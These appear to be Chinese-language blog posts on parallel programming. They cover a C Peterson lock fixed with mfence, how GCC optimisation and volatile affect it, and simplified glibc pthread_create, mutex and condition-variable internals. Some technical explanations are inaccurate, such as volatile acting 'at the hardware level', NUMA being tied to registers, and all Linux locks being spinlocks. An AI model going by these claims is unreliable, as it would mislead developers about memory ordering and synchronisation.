Lock的时候遇到了一些问题,就将问题抛给了前Mentor(Derek, Zhang)。经过两天的讨论,将所有的细节罗列在这份报告里面,对于所有的外部资料的引用,只会贴出链接,作者并不做任何形式的翻译或者转述,这样可以保证所有信息的准确性。 10 | 11 | ### Peterson Locking Algorithm实现 12 |   关于Peterson Locking Algorithm,请参考Wiki:[Peterson's algorithm](https://en.wikipedia.org/wiki/Peterson's_algorithm) 13 | ```c 14 | #ifndef _PETERSON_LOCK_H 15 | #define _PETERSON_LOCK_H 16 | /* 17 | * Description: implementing peterson's locking algorithm 18 | * File: peterson_lock.h 19 | * Author: Charles, Liu. 20 | * Mailto: charlesliu.cn.bj@gmail.com 21 | */ 22 | #include 23 | 24 | typedef struct { 25 | volatile bool flag[2]; 26 | volatile int victim; 27 | } peterson_lock_t; 28 | 29 | void peterson_lock_init(peterson_lock_t &lock) { 30 | lock.flag[0] = lock.flag[1] = false; 31 | lock.victim = 0; 32 | } 33 | 34 | void peterson_lock(peterson_lock_t &lock, int id) { 35 | lock.flag[id] = true; 36 | lock.victim = id; 37 | while (lock.flag[1 - id] && lock.victim == id); 38 | } 39 | 40 | void peterson_unlock(peterson_lock_t &lock, int id) { 41 | lock.flag[id] = false; 42 | lock.victim = id; 43 | } 44 | 45 | #endif 46 | ``` 47 |   以下是测试程序: 48 | ```c 49 | #include 50 | #include "peterson_lock.h" 51 | 52 | peterson_lock_t lock; 53 | int count = 0; 54 | 55 | void *routine0(void *arg) { 56 | int *cnt = (int *)arg; 57 | for (int i = 0; i < *cnt; ++i) { 58 | peterson_lock(lock, 0); 59 | ++count; 60 | printf("count: %d", count); 61 | peterson_unlock(lock, 0); 62 | } 63 | 64 | return NULL; 65 | } 66 | 67 | void *routine1(void *arg) { 68 | int *cnt = (int *)arg; 69 | for (int i = 0; i < *cnt; ++i) { 70 | peterson_lock(lock, 1); 71 | ++count; 72 | peterson_unlock(lock, 1); 73 | } 74 | } 75 | 76 | int main(int argc, char **argv) { 77 | peterson_lock_init(lock); 78 | pthread_t thread0, thread1; 79 | int count0 = 10000; 80 | int count1 = 20000; 81 | pthread_create(&thread0, NULL, routine0, (void *)&count0); 82 | pthread_create(&thread1, NULL, routine1, (void *)&count1); 83 | 84 | pthread_join(thread0, NULL); 85 | pthread_join(thread1, NULL); 86 | 87 | printf("Expected: %d\n", (count0 + count1)); 88 | printf("Reality : %d\n", count); 89 | 90 | return 0; 91 | } 92 | ``` 93 |   如果你编译运行以上的测试,会发现Peterson Lock的实现并没有达到目的,原因就是编译时期和运行时期都会有指令重排的问题。 94 | 95 | ### Memory Ordering 96 |   这里我不打算讲Memory Ordering的具体细节,所有信息都在下面的链接里: 97 | - 这里是Memory Ordering的Wiki -> [Memory ordering](https://en.wikipedia.org/wiki/Memory_ordering) 98 | - 这里的一篇文章讲到了Memory Ordering和Peterson Lock的问题 -> [Who ordered memory fences on an x86?](https://bartoszmilewski.com/2008/11/05/who-ordered-memory-fences-on-an-x86/) 99 | - 这里有更详细的关于Intel IA64 Memory Ordering的资料 -> [Intel® 64 Architecture Memory Ordering White Paper](http://www.cs.cmu.edu/~410-f10/doc/Intel_Reordering_318147.pdf) 100 | - C++ 里Memory Order相关的资料(由于atomic本身就用到了原子操作,所以我并不打算使用) -> [std::memory_order](http://en.cppreference.com/w/cpp/atomic/memory_order) 101 | 102 |   请你务必仔细看完以上的三份资料,不然无法继续进行接下来的内容。 103 |   以上Peterson Lock实现失败的原因就显而易见了,博主的机器是Intel x86-64 smp的机器,拥有strict memory order,也就是只有在store&load的 104 | 情况下才会有指令重拍的问题,而以上Peterson Lock的实现正好就是store&load的情况,为此我们必须避免CPU的指令重排。 105 | 106 | ### 关于Memory Fence 107 |   上节提到避免指令重排需要加Memory Fence,指令重排分为两种: 108 | - 一种是编译时期的指令重排,可以通过这个来防止:`asm volatile ("" : : : "memory")` 109 | - 一种是运行时期的cpu指令重排,同时也包含了防止编译时期的指令重排:`asm volatile ("mfence" : : : "memory")` or `asm volatile ("lfence" : : : "memory")` or `asm volatile ("sfence" : : : "memory")` 110 | 111 |   而Memory Fence分为三种: 112 | - mfence -> Performs a serializing operation on all load-from-memory and store-to-memory instructions that were issued prior the MFENCE instruction. **This serializing operation guarantees that every load and store instruction that precedes in program order the MFENCE instruction is globally visible before any load or store instruction that follows the MFENCE instruction is globally visible.** The MFENCE instruction is ordered with respect to all load and store instructions, other MFENCE instructions, any SFENCE and LFENCE instructions, and any serializing instructions (such as the CPUID instruction). 113 | Weakly ordered memory types can be used to achieve higher processor performance through such techniques as out-of-order issue, speculative reads, write-combining, and write-collapsing. 114 | The degree to which a consumer of data recognizes or knows that the data is weakly ordered varies among applications and may be unknown to the producer of this data. The MFENCE instruction provides a performance-efficient way of ensuring load and store ordering between routines that produce weakly-ordered results and routines that consume that data. 115 | It should be noted that processors are free to speculatively fetch and cache data from system memory regions that are assigned a memory-type that permits speculative reads (that is, the WB, WC, and WT memory types). The PREFETCHh instruction is considered a hint to this speculative behavior. Because this speculative fetching can occur at any time and is not tied to instruction execution, the MFENCE instruction is not ordered with respect to PREFETCHh instructions or any other speculative fetching mechanism (that is, data could be speculatively loaded into the cache just before, during, or after the execution of an MFENCE instruction). 116 | - lfence -> Performs a serializing operation on all load-from-memory instructions that were issued prior the LFENCE instruction. This serializing operation guarantees that every load instruction that precedes in program order the LFENCE instruction is globally visible before any load instruction that follows the LFENCE instruction is globally visible. The LFENCE instruction is ordered with respect to load instructions, other LFENCE instructions, any MFENCE instructions, and any serializing instructions (such as the CPUID instruction). It is not ordered with respect to store instructions or the SFENCE instruction. 117 | Weakly ordered memory types can be used to achieve higher processor performance through such techniques as out-of-order issue and speculative reads. The degree to which a consumer of data recognizes or knows that the data is weakly ordered varies among applications and may be unknown to the producer of this data. The LFENCE instruction provides a performance-efficient way of insuring load ordering between routines that produce weakly-ordered results and routines that consume that data. 118 | It should be noted that processors are free to speculatively fetch and cache data from system memory regions that are assigned a memory-type that permits speculative reads (that is, the WB, WC, and WT memory types). The PREFETCHh instruction is considered a hint to this speculative behavior. Because this speculative fetching can occur at any time and is not tied to instruction execution, the LFENCE instruction is not ordered with respect to PREFETCHh instructions or any other speculative fetching mechanism (that is, data could be speculative loaded into the cache just before, during, or after the execution of an LFENCE instruction). 119 | - sfence -> Performs a serializing operation on all store-to-memory instructions that were issued prior the SFENCE instruction. This serializing operation guarantees that every store instruction that precedes in program order the SFENCE instruction is globally visible before any store instruction that follows the SFENCE instruction is globally visible. The SFENCE instruction is ordered with respect store instructions, other SFENCE instructions, any MFENCE instructions, and any serializing instructions (such as the CPUID instruction). It is not ordered with respect to load instructions or the LFENCE instruction. 120 | Weakly ordered memory types can be used to achieve higher processor performance through such techniques as out-of-order issue, write-combining, and write-collapsing. The degree to which a consumer of data recognizes or knows that the data is weakly ordered varies among applications and may be unknown to the producer of this data. The SFENCE instruction provides a performance-efficient way of insuring store ordering between routines that produce weakly-ordered results and routines that consume this data. 121 | 122 |   参考Intel x86-64的Memory Ordering的设计,其实lfence和sfence在保证Memory Ordering这点上是没有意义的,因为Intel x86-64本来就是strict memory order,但是内存可见性这个点上,lfence和sfence任然有其价值,由于Peterson Lock是为了避免store&load的指令重排,所以我们使用mfence, 123 | 即Full Memory Fence。加上MFENCE之后的代码如下: 124 | ```c 125 | #ifndef _PETERSON_LOCK_H 126 | #define _PETERSON_LOCK_H 127 | /* 128 | * Description: implementing peterson's locking algorithm 129 | * File: peterson_lock.h 130 | * Author: Charles, Liu. 131 | * Mailto: charlesliu.cn.bj@gmail.com 132 | */ 133 | #include 134 | 135 | typedef struct { 136 | volatile bool flag[2]; 137 | volatile int victim; 138 | } peterson_lock_t; 139 | 140 | void peterson_lock_init(peterson_lock_t &lock) { 141 | lock.flag[0] = lock.flag[1] = false; 142 | lock.victim = 0; 143 | } 144 | 145 | void peterson_lock(peterson_lock_t &lock, int id) { 146 |   lock.flag[id] = true; // 子句A 147 |   lock.victim = id; // 子句B,子句A和B的顺序很重要,如果调换的话会出现问题 148 |   asm volatile ("mfence" : : : "memory"); // MFENCE加在store和load之间 149 |   while (lock.flag[1 - id] && lock.victim == id); 150 | } 151 | 152 | void peterson_unlock(peterson_lock_t &lock, int id) { 153 | lock.flag[id] = false; 154 | lock.victim = id; 155 | } 156 | 157 | #endif 158 | ``` 159 |   首先看一下MFENCE添加的位置是在store和load之间,其次思考这么一个问题,如果调换子句A和子句B的位置会出现什么情况呢? 160 | ```c 161 | peterson_lock_0: peterson_lock_1: 162 | ------------------------------------------------------- 163 | lock.victim = 0; 164 | lock.victim = 1; 165 | lock.flag[1] = true; 166 | asm volatile ("mfence" : : : "memory"); 167 | while (lock.flag[0] && lock.victim == 1); 168 | // lock.flag[0] is false so 169 | // the process enters critical 170 | // section 171 | lock.flag[0] = true; 172 | asm volatile ("mfence" : : : "memory"); 173 | while (lock.flag[1] && lock.victim == 0); 174 | // lock.victim is 1 so 175 | // the process enters critical 176 | // section 177 | ``` 178 |   Thread0和Thread1会同时进入Critical Section,再思考如下的情况, 179 | ```c 180 | Thread0: Thread1: 181 | ------------------------------------------------------- 182 | lock.flag[0] = true; 183 | lock.victim = 0; 184 | lock.flag[1] = true; 185 | lock.victim = 1; 186 | mfence; 187 | 如果这个时候Thread0的lock.victim = 0对于Thread1可见, 188 | 那么会进入Critical Section 189 | mfence; 190 | 如果这个时候Thread1的lock.victim = 1对于 191 | Thread0可见,那么会进入Critical Section 192 | ``` 193 |   以上情况并没有发生,为什么呢?请看mfence那段加粗的文字,这正是mfence的另一个作用,内存可见性。 194 | 195 | ### 关于volatile和GCC优化 196 |   如果去掉上面的两个volatile,不加优化,运行正常,`void peterson_lock(peterson_lock_t &lock, int id)`的汇编结果如下: 197 | ```asm 198 | 0000000000400638 <_Z13peterson_lockR15peterson_lock_ti>: 199 | 400638: 55 push rbp 200 | 400639: 48 89 e5 mov rbp,rsp 201 | 40063c: 48 89 7d f8 mov QWORD PTR [rbp-0x8],rdi 202 | 400640: 89 75 f4 mov DWORD PTR [rbp-0xc],esi 203 | 400643: 48 8b 55 f8 mov rdx,QWORD PTR [rbp-0x8] 204 | 400647: 8b 45 f4 mov eax,DWORD PTR [rbp-0xc] 205 | 40064a: 48 98 cdqe 206 | 40064c: c6 04 02 01 mov BYTE PTR [rdx+rax*1],0x1 ; Clause 1 207 | 400650: 48 8b 45 f8 mov rax,QWORD PTR [rbp-0x8] ; Clause 2 208 | 400654: 8b 55 f4 mov edx,DWORD PTR [rbp-0xc] ; Clause 3 209 | 400657: 89 50 04 mov DWORD PTR [rax+0x4],edx ; Clause 4 210 | 40065a: 0f ae f0 mfence 211 | 40065d: 90 nop 212 | 40065e: b8 01 00 00 00 mov eax,0x1 213 | 400663: 2b 45 f4 sub eax,DWORD PTR [rbp-0xc] 214 | 400666: 48 8b 55 f8 mov rdx,QWORD PTR [rbp-0x8] 215 | 40066a: 48 98 cdqe 216 | 40066c: 0f b6 04 02 movzx eax,BYTE PTR [rdx+rax*1] 217 | 400670: 84 c0 test al,al 218 | 400672: 74 0c je 400680 <_Z13peterson_lockR15peterson_lock_ti+0x48> 219 | 400674: 48 8b 45 f8 mov rax,QWORD PTR [rbp-0x8] 220 | 400678: 8b 40 04 mov eax,DWORD PTR [rax+0x4] 221 | 40067b: 3b 45 f4 cmp eax,DWORD PTR [rbp-0xc] 222 | 40067e: 74 de je 40065e <_Z13peterson_lockR15peterson_lock_ti+0x26> 223 | 400680: 5d pop rbp 224 | 400681: c3 ret 225 | ``` 226 |   请看上述汇编中标注出来的Clause 1-4,正好对应下面的两句话: 227 | ```c 228 | lock.flag[id] = true; 229 | lock.victim = id; 230 | ``` 231 |   但是值并没有存在寄存器里面,也并没有直接从寄存器读取,而是直接读取内存。 232 |   233 |   如果我们加上`-O2`再编译一次,得到的`void peterson_lock(peterson_lock_t &lock, int id)`的汇编结果如下: 234 | ```asm 235 | 00000000004007a0 <_Z13peterson_lockR15peterson_lock_ti>: 236 | 4007a0: 48 63 c6 movsxd rax,esi 237 | 4007a3: c6 04 07 01 mov BYTE PTR [rdi+rax*1],0x1 ; Clause 1 238 | 4007a7: 89 77 04 mov DWORD PTR [rdi+0x4],esi ; Clause 2 239 | 4007aa: 0f ae f0 mfence 240 | 4007ad: b8 01 00 00 00 mov eax,0x1 241 | 4007b2: 29 f0 sub eax,esi 242 | 4007b4: 48 98 cdqe 243 | 4007b6: 80 3c 07 00 cmp BYTE PTR [rdi+rax*1],0x0 244 | 4007ba: 75 04 jne 4007c0 <_Z13peterson_lockR15peterson_lock_ti+0x20> 245 | 4007bc: f3 c3 repz ret 246 | 4007be: 66 90 xchg ax,ax 247 | 4007c0: 39 77 04 cmp DWORD PTR [rdi+0x4],esi 248 | 4007c3: 75 f7 jne 4007bc <_Z13peterson_lockR15peterson_lock_ti+0x1c> 249 | 4007c5: 39 77 04 cmp DWORD PTR [rdi+0x4],esi 250 | 4007c8: 74 f6 je 4007c0 <_Z13peterson_lockR15peterson_lock_ti+0x20> 251 | 4007ca: eb f0 jmp 4007bc <_Z13peterson_lockR15peterson_lock_ti+0x1c> 252 | 4007cc: 0f 1f 40 00 nop DWORD PTR [rax+0x0] 253 | ``` 254 |   请注意上面的Clause 1-2,发现没,`lock.flag[id]`变为了直接赋值,而`lock.victim`的值变为从`esi`寄存器读,由于现在CPU架构大多都是NUMA架构,我的也是,各个CPU独享自己的寄存器,然后`gdb -tui [our program]`,`break peterson_lock`然后运行发现,直接跳转如下: 255 | 256 |   并没有`peterson_lock`函数,也就是`-O2`直接将它inline掉了。如果运行程序会发现程序直接死锁了,下面我会给出解释的,先让我们看看`-O3`编译出的版本: 257 | ```asm 258 | 00000000004007a0 <_Z13peterson_lockR15peterson_lock_ti>: 259 | 4007a0: 48 63 c6 movsxd rax,esi 260 | 4007a3: c6 04 07 01 mov BYTE PTR [rdi+rax*1],0x1 261 | 4007a7: 89 77 04 mov DWORD PTR [rdi+0x4],esi 262 | 4007aa: 0f ae f0 mfence 263 | 4007ad: b8 01 00 00 00 mov eax,0x1 264 | 4007b2: 29 f0 sub eax,esi 265 | 4007b4: 48 98 cdqe 266 | 4007b6: 80 3c 07 00 cmp BYTE PTR [rdi+rax*1],0x0 267 | 4007ba: 74 05 je 4007c1 <_Z13peterson_lockR15peterson_lock_ti+0x21> 268 | 4007bc: 3b 77 04 cmp esi,DWORD PTR [rdi+0x4] 269 | 4007bf: 74 07 je 4007c8 <_Z13peterson_lockR15peterson_lock_ti+0x28> 270 | 4007c1: f3 c3 repz ret 271 | 4007c3: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0] 272 | 4007c8: eb fe jmp 4007c8 <_Z13peterson_lockR15peterson_lock_ti+0x28> 273 | 4007ca: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0] 274 | ``` 275 |   和`-O2`的版本并没有多大差别,如果运行的话还是会死锁。为什么会死锁呢?解释如下: 276 | ```c 277 | 由于lock.victim的值直接从寄存器读取,那么lock.victim == id 的条件恒成立 278 | 279 | Thread0                             Thread1 280 | ------------------------------------------------------------------ 281 | lock.flag[0] = true; lock.flag[1] = true; 282 | lock.victim = 0; lock.victim = 1; 283 | mfence; mfence; 284 | while (lock.flag[1] && lock.victim == 0);       while (lock.flag[0] && lock.victim == 1); 285 | 同时进入死锁 286 | ``` 287 |   其实由于Thread0写`lock.flag[0]`,读`lock.flag[1]`;Thread1写`lock.flag[1]`,读`lock.flag[0]`,即各自读写不同的内存,所以`bool lock.flag[2]`之前的`volatile`是可以去掉的,但是`volatile int lock.victim`前面的`volatile`是必须得保留的。 288 |   总结一下,`volatile`修饰的作用就是避免在Hardware层面上,变量的值会被写进寄存器,这样也就不会从寄存器读取了。 289 | 290 | ### 本报告的简略PDF 291 |   [Peterson Locking Algorithm Report](https://github.com/linghuazaii/parallel_programming/blob/master/petersons/peterson_report.pdf) 292 | 293 | ### 小结 294 |   满满的干货,Good Luck, Have Fun!!! 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | 306 | 307 | 308 | 309 | 310 | 311 | -------------------------------------------------------------------------------- /parallel-programming-pthreads1.md: -------------------------------------------------------------------------------- 1 | [Parallel Programming]深入PThread (Lesson I) 2 | ============================================ 3 | 4 | ### 前言 5 |   因为最近一直在研究Parallel Programming方面的东西,Lock的实现,一些Design Patterns以及atomic,fence,lock-free之类的东西。我学东西都是比较分散的,不是一个东西一本书或者一份资料啃到底。今天刚好到PThreads,将一些东西记录如下。 6 | 7 | ### Hyper Thread 8 |    9 |   在你的印象中,内存是不是这样的?古老的UMA(Uniform Memory Access),多个CPU共享一整个RAM。 10 |    11 |   现在的Linux Server,基本都是这样的,是不是感觉世界瞬间不一样了?即所说的NUMA(Non-Uniform Memory Access)。 12 |    13 |   单个CPU是这样的,内存访问也并不是你印象中的直接由RAM拿到,而是由RAM=>CPU Cache=>CPU。在公司的Server上`lscpu`结果如下:   14 | ``` 15 | Architecture:         x86_64 16 | CPU op-mode(s): 32-bit, 64-bit 17 | Byte Order: Little Endian 18 | CPU(s): 4 19 | On-line CPU(s) list: 0-3 20 | Thread(s) per core: 2 21 | Core(s) per socket: 2 22 | Socket(s): 1 23 | NUMA node(s): 1 24 | Vendor ID: GenuineIntel 25 | CPU family: 6 26 | Model: 63 27 | Model name: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz 28 | Stepping: 2 29 | CPU MHz: 2400.058 30 | BogoMIPS: 4800.11 31 | Hypervisor vendor: Xen 32 | Virtualization type: full 33 | L1d cache: 32K 34 | L1i cache: 32K 35 | L2 cache: 256K 36 | L3 cache: 30720K 37 | NUMA node0 CPU(s): 0-3 38 | ``` 39 | 单个CPU有三级缓存,访问的clock cycle递增,L1 Cache最快。x86用的CISC指令集,CISC指令集比RISC复杂,Decode的Cost要更高,所以有两个L1 Cache,即L1i(instruction)Cache,用来缓存Decode的CPU指令;L1d(Data)Cache,用来缓存内存数据。   40 |    41 |   多个CPU是这样的,图中给出了两个物理CPU,每个物理CPU有两个Core,每个Core有两个thread,两个thread共享L1i和L1d,Intel的thread实现是这样的,它们有各自独有的寄存器,但是有些寄存器还是共享的,以上就是Intel的Hyper Thread设计。当然,只是一个例子,不同的CPU可能用的不同的架构。你可能会问,这些和Pthread有关吗?关系不大,但是了解了这些便于你更好的理解Memory Model和内存可见性方面的问题。 42 | 43 | ### pthread_create 44 |   我们调用`pthread_create(&tid, NULL, start_routine, args)`会经历哪些步骤呢?将attribute置为NULL是为了简化问题,下文我们会提到的。 45 | ```c 46 | int __pthread_create_2_1 (pthread_t *newthread, const pthread_attr_t *attr, 47 | void *(*start_routine) (void *), void *arg) 48 | { 49 | const struct pthread_attr *iattr = (struct pthread_attr *) attr; 50 | struct pthread_attr default_attr; 51 | if (iattr == NULL) 52 | { 53 | lll_lock (__default_pthread_attr_lock, LLL_PRIVATE); 54 | default_attr = __default_pthread_attr; 55 | lll_unlock (__default_pthread_attr_lock, LLL_PRIVATE); 56 | iattr = &default_attr; 57 | } 58 | 59 | struct pthread *pd = NULL; 60 | int err = ALLOCATE_STACK (iattr, &pd); 61 | pd->start_routine = start_routine; 62 | pd->arg = arg; 63 | atomic_increment (&__nptl_nthreads); 64 | bool thread_ran = false; 65 | retval = create_thread (pd, iattr, true, STACK_VARIABLES_ARGS, 66 | } 67 | ``` 68 |   函数精简后大致是这样的,但是我没有找到`__default_pthread_attr`设置`cpuset`的地方,`pthread_create`会接着调用`create_thread`。 69 | ```c 70 | static int create_thread (struct pthread *pd, const struct pthread_attr *attr, 71 | bool stopped_start, STACK_VARIABLES_PARMS, bool *thread_ran) 72 | { 73 | /* We rely heavily on various flags the CLONE function understands: 74 | CLONE_VM, CLONE_FS, CLONE_FILES 75 | These flags select semantics with shared address space and 76 | file descriptors according to what POSIX requires. 77 | CLONE_SIGHAND, CLONE_THREAD 78 | This flag selects the POSIX signal semantics and various 79 | other kinds of sharing (itimers, POSIX timers, etc.). 80 | CLONE_SETTLS 81 | The sixth parameter to CLONE determines the TLS area for the 82 | new thread. 83 | CLONE_PARENT_SETTID 84 | The kernels writes the thread ID of the newly created thread 85 | into the location pointed to by the fifth parameters to CLONE. 86 | Note that it would be semantically equivalent to use 87 | CLONE_CHILD_SETTID but it is be more expensive in the kernel. 88 | CLONE_CHILD_CLEARTID 89 | The kernels clears the thread ID of a thread that has called 90 | sys_exit() in the location pointed to by the seventh parameter 91 | to CLONE. 92 | The termination signal is chosen to be zero which means no signal 93 | is sent. */ 94 | const int clone_flags = (CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM 95 | | CLONE_SIGHAND | CLONE_THREAD 96 | | CLONE_SETTLS | CLONE_PARENT_SETTID 97 | | CLONE_CHILD_CLEARTID 98 | | 0); 99 | ARCH_CLONE (&start_thread, STACK_VARIABLES_ARGS, 100 | clone_flags, pd, &pd->tid, tp, &pd->tid); 101 | *thread_ran = true; 102 | if (attr != NULL) 103 | { 104 | INTERNAL_SYSCALL_DECL (err); 105 | if (attr->cpuset != NULL) 106 | { 107 | res = INTERNAL_SYSCALL (sched_setaffinity, err, 3, pd->tid, 108 | attr->cpusetsize, attr->cpuset); 109 | } 110 | if ((attr->flags & ATTR_FLAG_NOTINHERITSCHED) != 0) 111 | { 112 | res = INTERNAL_SYSCALL (sched_setscheduler, err, 3, pd->tid, 113 | pd->schedpolicy, &pd->schedparam); 114 | } 115 | } 116 | return 0; 117 | } 118 | ``` 119 |   这里需要注意的是上面的一堆`flags`和它们的说明,可以发现,对于所有\*nix系统来说,线程就是轻量级的进程,线程无非就是共享了除栈外几乎所有进程所有的资源,所以线程的切换消耗无非就是保存寄存器的值和线程自己的栈数据。下次如果有人问你线程和进程的区别,一定要回答的深入一点,这样就可以吊打面试官啦! 120 | ```c 121 | #define ARCH_FORK() \ 122 | INLINE_SYSCALL (clone2, 6, \ 123 | CLONE_CHILD_SETTID | CLONE_CHILD_CLEARTID | SIGCHLD, \ 124 | NULL, 0, NULL, &THREAD_SELF->tid, NULL) 125 | #define ARCH_CLONE __clone2 126 | ``` 127 | ```asm 128 | /* int __clone2(int (*fn) (void *arg), void *child_stack_base, */ 129 | /* size_t child_stack_size, int flags, void *arg, */ 130 | /* pid_t *parent_tid, void *tls, pid_t *child_tid) */ 131 | 132 | #define CHILD p8 133 | #define PARENT p9 134 | 135 | ENTRY(__clone2) 136 | .prologue 137 | alloc r2=ar.pfs,8,1,6,0 138 | cmp.eq p6,p0=0,in0 139 | cmp.eq p7,p0=0,in1 140 | mov r8=EINVAL 141 | mov out0=in3 /* Flags are first syscall argument. */ 142 | mov out1=in1 /* Stack address. */ 143 | (p6) br.cond.spnt.many __syscall_error /* no NULL function pointers */ 144 | (p7) br.cond.spnt.many __syscall_error /* no NULL stack pointers */ 145 | ;; 146 | mov out2=in2 /* Stack size. */ 147 | mov out3=in5 /* Parent TID Pointer */ 148 | mov out4=in7 /* Child TID Pointer */ 149 | mov out5=in6 /* TLS pointer */ 150 | /* 151 | * clone2() is special: the child cannot execute br.ret right 152 | * after the system call returns, because it starts out 153 | * executing on an empty stack. Because of this, we can't use 154 | * the new (lightweight) syscall convention here. Instead, we 155 | * just fall back on always using "break". 156 | * 157 | * Furthermore, since the child starts with an empty stack, we 158 | * need to avoid unwinding past invalid memory. To that end, 159 | * we'll pretend now that __clone2() is the end of the 160 | * call-chain. This is wrong for the parent, but only until 161 | * it returns from clone2() but it's better than the 162 | * alternative. 163 | */ 164 | mov r15=SYS_ify (clone2) 165 | .save rp, r0 166 | break __BREAK_SYSCALL 167 | .body 168 | cmp.eq p6,p0=-1,r10 169 | cmp.eq CHILD,PARENT=0,r8 /* Are we the child? */ 170 | (p6) br.cond.spnt.many __syscall_error 171 | ;; 172 | (CHILD) mov loc0=gp 173 | (PARENT) ret 174 | ;; 175 | tbit.nz p6,p0=in3,8 /* CLONE_VM */ 176 | (p6) br.cond.dptk 1f 177 | ;; 178 | mov r15=SYS_ify (getpid) 179 | (p7) break __BREAK_SYSCALL 180 | ;; 181 | add r9=PID,r13 182 | add r10=TID,r13 183 | ;; 184 | st4 [r9]=r8 185 | st4 [r10]=r8 186 | ;; 187 | 1: ld8 out1=[in0],8 /* Retrieve code pointer. */ 188 | mov out0=in4 /* Pass proper argument to fn */ 189 | ;; 190 | ld8 gp=[in0] /* Load function gp. */ 191 | mov b6=out1 192 | br.call.dptk.many rp=b6 /* Call fn(arg) in the child */ 193 | ;; 194 | mov out0=r8 /* Argument to _exit */ 195 | mov gp=loc0 196 | .globl HIDDEN_JUMPTARGET(_exit) 197 | br.call.dpnt.many rp=HIDDEN_JUMPTARGET(_exit) 198 | /* call _exit with result from fn. */ 199 | ret /* Not reached. */ 200 | PSEUDO_END(__clone2) 201 | ``` 202 |   虽然我看不懂C里面的asm但是它调用了Linux的`clone2`,但是我没找到`clone2`的源码,反正肯定会调用`sys_clone`。`sys_clone`会创建一个新的进程,与`fork`不同的是,`sys_clone`容许新的进程共享父进程的内存,各种不同的段以及其他的东西,得到的pid就是新建的线程的thread id。继续回到之前,线程创建之后会根据`thread_attr`接着调用`sched_setaffinity`。`sched_setaffinity`的作用就是将CPU Core和Thread绑定,让thread只在指定的CPU上执行,这样做可以提升Performance。上文提到过,不同的CPU Core是不共享L1i和L1d的,这样线程去另一个CPU Core执行的话,会导致Cache Invalidation,这样就会导致内存读取,还是一个很大的损耗的,所以对于CPU Bound的程序来说,设置CPU affinity可以提升Performance。接着会调用`sched_setscheduler`,设置线程调度的优先级和调度策略。 203 | 204 | ### 结语 205 |   本课内容看似简短,其实扩展开来都是很复杂很深的课题。扩展的活儿就交给你自己啦,任何问题都可以撩博主,与博主交流!**Good Luck!Have Fun!** 206 | -------------------------------------------------------------------------------- /parallel-programming-pthreads2.md: -------------------------------------------------------------------------------- 1 | [Parallel Programming]深入PThread (Lesson II) 2 | ============================================= 3 | 4 | ### 回顾 5 |   上一节课我们讲了`pthread_create()`,这节课讲`mutex`和`condition variable`,东西有点多,我还以为我讲过`mutex`了,我有讲过吗? 6 | 7 | ### 前言 8 |   `Pthreads`所有的东西的实现都是基于`Futex`,但是不打算讲`Futex`,我没看,感兴趣可以去这挖一挖。 9 |   [Futex Wiki](https://en.wikipedia.org/wiki/Futex) 10 | 11 | ### pthread_mutex_lock & pthread_mutex_unlock 12 |   其实Linux内核包括`Futex`,所有锁的实现都是spinlock,即test&set。关于test&set可以参考[Wiki](https://en.wikipedia.org/wiki/Test-and-set)。锁的本质其实就是原子操作,而原子操作需要hardware级别的支持,好在`xchg`系列交换值的指令是存在的,而且是原子性的,上层的调用类似`atomic_compare_and_exchange_val_acq`到汇编这一层就是这些原子指令。关于CAS(compare-and-swap)锁的例子,我自己写了一个,[看这里](https://github.com/linghuazaii/parallel_programming/tree/master/test_and_set_lock)。那么我们`pthread_mutex_lock`和`pthread_mutex_unlock`我们就讲完啦。我们不讲Futex,所以也不讲`pthread_mutex_t`之类的结构,只谈本质的话,锁就是这么简单。 13 | 14 | ### pthread_cond_wait 15 |   同样也不讲`pthread_cond_t`之类的结构,理由同上,但是还是有些细节要讲一讲。 16 | ```c 17 | __pthread_cond_wait (pthread_cond_t *cond, pthread_mutex_t *mutex) 18 | { 19 | err = __pthread_mutex_unlock_usercnt (mutex, 0); 20 | cond->__data.__nwaiters += 1 << COND_NWAITERS_SHIFT; 21 | do { 22 | lll_futex_wait (&cond->__data.__futex, futex_val, pshared); 23 | } while (val == seq || cond->__data.__woken_seq == val); 24 | ++cond->__data.__woken_seq; 25 | return __pthread_mutex_cond_lock (mutex); 26 | } 27 | ``` 28 |   代码简化完后大致干了这几件事,先解锁`mutex`,不然发送signal的线程没法获得这把锁,然后调用`lll_futex_wait`一直等待自己被唤醒,完了将`mutex`锁住。有人或许要问:为什么`condition variable`需要配一把锁呢?简而言之,设计使然,而且这个设计也是一石二鸟啊。首先等待的`condition`肯定是共享的资源,而且条件变量自身也是共享的资源,一把锁解决了两个共享资源的问题,棒不棒?!如果没有锁会怎么样?看看常见的条件变量用法: 29 | ```c 30 | Thread 1                                     Thread2 31 | ----------------------------- ------------------------------------- 32 | //pthread_mutex_lock(&mutex); //pthread_mutex_lock(&mutex); 33 | while(wait condition become true) change conditon to true; 34 | pthread_cond_wait(&cond, &mutex); pthread_cond_signal(&cond); 35 | do things; //pthread_mutex_unlock(&mutex); 36 | //pthread_mutex_unlock(&mutex); 37 | ``` 38 |   我们把锁注掉看会发生什么,假设`Thread1`运行在`CPU0`,`Thread2`运行在`CPU1`,首先考虑一下指令重排的情况:如果`condition = true`和`pthread_cond_signal`重排了,信号发了,在`pthread_cond_wait`之前,那么这个信号丢失了,`Thread1`永远Block在`pthread_cond_wait`。再考虑指令不重排的情况:由于是不同的CPU,所以彼此的cacheline并不一定可见,所以`thread2`运行`condition = true`然后发送`pthread_cond_signal`,对于`thread1`,`condition = true`暂时不可见,就会进入`while`,信号丢失,`pthread_cond_wait`永远Block。所以呢,加这把锁就很好的防止了信号丢失的问题。聪明的你可能会继续问:那为什么要`while`循环呢?这是为了保证系统的健壮性,对于内核来说,并不是什么都是确定的,可能由于某种意外情况,就好比意外怀孕一样,这个信号在条件不满足的时候也发出去了呢?这种Wakeup并不违反标准,所以Pthreads这么设计也是为了迎合标准,感兴趣可以Google下**Spurious Wake Up**。 39 | 40 | ### pthread_cond_signal & pthread_cond_broadcast 41 |   线程唤醒的原则遵循scheduler的标准,即wakeup的时候,谁的priority大,就唤醒谁,像`SCHED_OTHER`这种默认的`min/max priority`都为`0`的时间片抢占的情况来说,first-in-first-out,很公平。如果你要设计`priority`的话,类似于所有的实时程序设计,使用`SCHED_RR`或者`SCHED_FIFO`。   42 |   